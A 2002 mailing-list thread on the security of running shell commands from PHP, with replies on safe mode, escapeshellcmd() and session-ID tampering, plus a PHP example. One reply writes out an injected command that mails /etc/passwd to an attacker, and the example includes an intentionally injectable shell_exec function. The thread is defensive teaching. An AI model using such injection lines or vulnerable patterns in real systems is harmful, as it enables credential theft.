Hi list, I wrote a PHP script which reads the information given in /proc/uptime by executing "cat /proc/uptime".

<?PHP $prog = 'cat /proc/uptime'; while ($i<count($prog)) { . . . } ?>

My question is: Is it safe to execute an external program when entering a site? Or is it generally a security risk? Which severity would you give (1 - low, 10 - highest)?

Ciao ;-)
Robert Rottscholl - DE
On Wednesday, 17 April 2002 13:06, Robert Rottscholl wrote:
My question is: Is it safe to execute an external program when entering a site? Or is it generally a security risk? Which severity would you give (1 - low, 10 - highest)?
I would run PHP in "safe mode" and put the programs to be run into special scripts in the PHP "safe execution" directory. If the access is going to be restricted, SSL access should also be considered (if only to encrypt the userid+password pairs). The safety of the server and web-directory structure is then the next element of the chain to be considered (for example, does the server allow CGI execution and such). Additionally the overall security of the server plays an important role (e.g. how secure is the access and the other applications on the server). Restrict access to certain IPs through SuSEfirewall2 - if possible - and don't allow shell access and/or altering the webpages by normal users - there you go. Pretty standard webserver stuff; if you do your homework, check logs regularly and invest some time into a simple IDS, technical security should reach 80 out of a hundred. But why don't you connect through ssh for this simple problem?

--
Michael Zimmermann (Vegaa Safety and Security for Internet Services) <zim@vegaa.de>
phone +49 89 6283 7632 hotline +49 163 823 1195
Key fingerprint = 1E47 7B99 A9D3 698D 7E35 9BB5 EF6B EEDB 696D 5811
Yuppa, Robert Rottscholl wrote: [...]
<?PHP $prog = 'cat /proc/uptime'; while ($i<count($prog)) { . . . } ?>
My question is: Is it safe to execute an external program when entering a site? Or is it generally a security risk? Which severity would you give (1 - low, 10 - highest)?
Ciao ;-)
Robert Rottscholl - DE
It's very risky to use external tools in PHP (and other) scripts if you don't check the variables or if user input gets processed. I'd give it a solid "8" on your scale... For ex., if someone would somehow inject "mail </etc/passwd someone@somewhere.com" into the variable used in an exec() function without checking for shell escapes, the command would be executed and the passwd would be mailed to the attacker. To prevent these kinds of problems with special shell characters, the use of PHP's escapeshellcmd() function is highly recommended. It filters out any chars like /, \, > and more (look into the PHP manual, chapter XIV., Program Execution functions, for more info).

What's more, unchecked and insecure opening, using and closing of file descriptors (e.g. for creating ASCII output) may cause race conditions, which would enable attackers to redirect the input or output stream, thus overwriting critical data (shadow, anyone?) or "hijacking" the stream (not too trivial, though).

I have seen quite some php3/4 online shops which heavily rely on the <hidden> HTML tag to store session IDs for non-cookie-based sites in order to hand the ID over to the next page and/or database. A simple "http://<url of webshop>?sessionid=foobar" often is enough to inject "foobar" instead of a real session ID in the variable, which may cause serious problems (just think of badly programmed online payment systems). Even some existing password schemes programmed in php3/4 are affected by this. Matt's script archive contains some of them... that's why it's a VERY bad idea to download and use public scripts without at least a basic security analysis.

Btw., take a look at the chapter "Security" in the PHP manual, too.

Boris Lorenz <bolo@lupa.de>
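To make the two points above concrete (shell metacharacters reaching exec(), and unvalidated IDs arriving via GET), here is an added example written for this thread, not code from Robert or Boris. It assumes a hypothetical "stat" GET parameter and modern PHP (7.1 or later); it shows the risky pattern, the no-exec way to read /proc/uptime, an allow-listed exec, and an ID check.

```php
<?php
// Added example, not code from the thread. "stat" is a hypothetical
// GET parameter selecting which /proc file to display.

// 1. Risky: user input is spliced straight into the command string, so
//    anything after a ';' or '|' in $stat becomes a second shell command.
function uptime_unsafe(string $stat): ?string {
    return shell_exec("cat /proc/$stat");
}

// 2. Safer for Robert's case: no external program at all. Reading the
//    pseudo-file directly gives the same data with no shell involved.
function uptime_no_exec(): ?string {
    $raw = @file_get_contents('/proc/uptime');
    if ($raw === false) { return null; }
    [$up] = explode(' ', trim($raw));          // "12345.67 54321.00"
    $secs = (int) $up;
    return sprintf('up %d days, %02d:%02d',
        intdiv($secs, 86400), intdiv($secs % 86400, 3600), intdiv($secs % 3600, 60));
}

// 3. If a program really has to be run: allow-list the input first, use a
//    fixed absolute path, and quote every argument with escapeshellarg().
function proc_file_exec(string $stat): ?string {
    $allowed = ['uptime' => '/proc/uptime', 'loadavg' => '/proc/loadavg'];
    if (!isset($allowed[$stat])) { return null; }      // reject everything else
    $cmd = '/bin/cat ' . escapeshellarg($allowed[$stat]);
    return shell_exec($cmd);
}

// 4. Same allow-list idea for the session-id case: accept only the
//    characters a real ID could contain, and only a plausible length.
function valid_session_id(string $id): bool {
    return (bool) preg_match('/^[A-Za-z0-9]{16,64}$/', $id);
}

$stat = $_GET['stat'] ?? 'uptime';
echo uptime_no_exec() ?? 'uptime unavailable', "\n";
echo proc_file_exec($stat) ?? 'not allowed', "\n";
```

valid_session_id() only filters the shape of the value; a real fix also binds the ID to server-side session state rather than trusting whatever the client sends.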